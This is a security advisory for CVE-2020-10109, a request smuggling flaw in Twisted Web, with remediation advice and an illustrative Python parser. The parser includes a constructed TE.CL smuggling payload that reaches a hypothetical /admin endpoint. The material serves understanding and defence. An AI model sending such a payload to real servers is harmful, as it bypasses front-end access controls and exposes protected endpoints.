PT-2019-5690 · Twisted · Twisted Web
Jake Miller
Published 2019-05-12 · Updated 2025-03-26
CVE-2020-10109
CVSS v2.0: 10.0 (Critical)
| Vector | AV:N/AC:L/Au:N/C:C/I:C/A:C |
Name of the Vulnerable Software and Affected Versions
Twisted Web 19.10.0 and earlier (every release prior to 20.3.0, the release that contains the fix)
Description
Twisted Web contains an HTTP request splitting (request smuggling) vulnerability. When a request carries both a Content-Length header and a Transfer-Encoding: chunked header, Twisted Web gives Content-Length precedence. This contradicts RFC 7230 section 3.3.3, which requires Transfer-Encoding to override Content-Length and notes that such a message should be treated as an error. Twisted Web consumes only the number of body bytes named by Content-Length, and whatever remains of the chunked body is parsed as a second, pipelined request. A front-end proxy that honours Transfer-Encoding forwards the attacker's message as one request, while Twisted Web behind it sees two, so the second request is smuggled past whatever access controls the front end enforces. The root cause is insufficient validation of conflicting message-framing headers; a remote, unauthenticated attacker can use it to bypass front-end restrictions or to cause a denial of service.
Recommendations
Update Twisted to 20.3.0 or later. Starting with 20.3.0, Twisted Web rejects a request that carries both a Content-Length and a Transfer-Encoding header with 400 Bad Request instead of framing the body from Content-Length.
As a temporary workaround, reject at the edge (reverse proxy or WAF) any request that carries both a Content-Length and a Transfer-Encoding header, which RFC 7230 section 3.3.3 explicitly permits, and make sure the front end never forwards a request to Twisted Web with both headers intact. Blocking either header on its own is not a fix: ordinary clients need Content-Length or chunked encoding to send a body, and the attack needs both headers on the same request.
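The framing conflict described above and the reject-on-conflict behaviour the recommendation relies on, demonstrated in a small request splitter. This is an added example written for this page, not code from Twisted (whose real parser lives in twisted.web.http) or from the advisory's author. The payload is constructed for illustration, and the function names, the three mode names and the hypothetical /admin target are this example's own assumptions.

```python
# Added example, not Twisted's code: a minimal HTTP/1.1 request splitter that
# can be switched between the framing rule Twisted Web <= 19.10.0 applied
# (Content-Length wins), the RFC 7230 rule (Transfer-Encoding wins) and the
# hardened rule that Twisted 20.3.0 and a careful edge proxy apply (reject).
from dataclasses import dataclass, field


class BadRequest(Exception):
    """Raised when the byte stream cannot be framed safely."""


@dataclass
class Request:
    method: str
    target: str
    headers: dict = field(default_factory=dict)
    body: bytes = b""


def _parse_head(buf: bytes):
    """Split the request line and headers off the front of buf."""
    end = buf.find(b"\r\n\r\n")
    if end < 0:
        raise BadRequest("incomplete request head")
    lines = buf[:end].split(b"\r\n")
    method, target, _version = lines[0].decode("ascii").split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().decode("ascii").lower()] = value.strip().decode("ascii")
    return method, target, headers, buf[end + 4:]


def _read_chunked(rest: bytes):
    """Decode a chunked body; return (decoded body, unread remainder)."""
    body = b""
    while True:
        line_end = rest.find(b"\r\n")
        if line_end < 0:
            raise BadRequest("truncated chunk-size line")
        size = int(rest[:line_end].split(b";")[0], 16)  # ignore chunk extensions
        rest = rest[line_end + 2:]
        if size == 0:  # last-chunk; this example carries no trailers
            if not rest.startswith(b"\r\n"):
                raise BadRequest("missing CRLF after last-chunk")
            return body, rest[2:]
        if len(rest) < size + 2 or rest[size:size + 2] != b"\r\n":
            raise BadRequest("truncated or badly terminated chunk")
        body += rest[:size]
        rest = rest[size + 2:]


def parse_requests(buf: bytes, mode: str):
    """Frame every request in buf. mode is one of:
    'vulnerable' - Content-Length beats Transfer-Encoding (CVE-2020-10109);
    'rfc'        - Transfer-Encoding beats Content-Length (RFC 7230 3.3.3);
    'strict'     - a request carrying both headers is rejected outright.
    """
    requests = []
    while buf:
        method, target, headers, rest = _parse_head(buf)
        has_cl = "content-length" in headers
        has_te = headers.get("transfer-encoding", "").lower() == "chunked"
        if has_cl and has_te:
            if mode == "strict":
                raise BadRequest("both Content-Length and Transfer-Encoding present")
            use_cl = mode == "vulnerable"
        else:
            use_cl = has_cl
        if use_cl:
            n = int(headers["content-length"])
            body, buf = rest[:n], rest[n:]
        elif has_te:
            body, buf = _read_chunked(rest)
        else:
            body, buf = b"", rest
        requests.append(Request(method, target, headers, body))
    return requests


# Constructed TE.CL payload (not a capture): the smuggled request sits inside a
# single chunk. Its Content-Length: 7 is sized to swallow the CRLF, the "0"
# last-chunk and the final CRLF that follow it, so a Content-Length-framing back
# end sees a clean second request with nothing left over.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: victim\r\nContent-Length: 7\r\n\r\n"
FIRST_BODY = b"%x\r\n" % len(SMUGGLED)  # the chunk-size line "38\r\n", 4 bytes
PAYLOAD = (
    b"POST / HTTP/1.1\r\nHost: victim\r\n"
    + b"Content-Length: %d\r\n" % len(FIRST_BODY)
    + b"Transfer-Encoding: chunked\r\n\r\n"
    + FIRST_BODY + SMUGGLED + b"\r\n0\r\n\r\n"
)


def targets_seen(mode: str):
    """Request targets a server applying the given framing rule would handle."""
    return [r.target for r in parse_requests(PAYLOAD, mode)]


def strict_rejects(payload: bytes = PAYLOAD) -> bool:
    """True if the hardened rule refuses to frame the payload at all."""
    try:
        parse_requests(payload, "strict")
    except BadRequest:
        return True
    return False


if __name__ == "__main__":
    print("vulnerable:", targets_seen("vulnerable"))  # ['/', '/admin']
    print("rfc:       ", targets_seen("rfc"))         # ['/']
    print("strict rejects:", strict_rejects())        # True
```

In a real TE.CL deployment the front end, honouring Transfer-Encoding, forwards PAYLOAD as a single POST / whose body happens to contain HTTP text; the 'vulnerable' mode shows what a Twisted Web back end that frames by Content-Length then makes of it, namely a second GET /admin the front end never inspected. The 'strict' mode is the behaviour Twisted 20.3.0 adopted and the check the edge-proxy workaround should enforce.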
Exploit
Fix
HTTP Request/Response Smuggling
RCE
Related identifiers
Affected products
Astra Linux
Centos
Red Hat
Red Os
Suse
Twisted Web
Ubuntu